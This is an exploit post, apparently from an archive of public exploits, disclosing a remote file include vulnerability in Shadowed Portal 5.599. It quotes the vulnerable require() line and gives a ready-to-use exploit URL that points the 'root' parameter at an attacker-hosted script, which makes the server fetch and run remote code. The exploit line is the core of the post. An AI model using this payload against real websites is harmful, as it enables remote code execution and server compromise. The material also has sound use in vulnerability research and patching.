id: 827
date: 09/12/2006
title: Shadowed Portal <= 5.599 (root) Remote File Include Vulnerability
author: mad_hacker
cves: 

=================================================================
Shadowed Portal <= 5.599 (root) Remote File Include Vulnerability
=================================================================


+Shadowed Portal 5.599 (root) Remote File Include Vulnerability

==============================================================================

+Author: mad_hacker (turkish hacker)

==============================================================================

+Class: Remote

==============================================================================

+Vuln Code: require($root."/footer.php");

==============================================================================,

+Exploit: 
http://www.site.com/[script_path]/bottom.php?root=http://evil_scripts?

==============================================================================

+Thanx: xoron, Leak



#  0day.today [2023-03-27]  #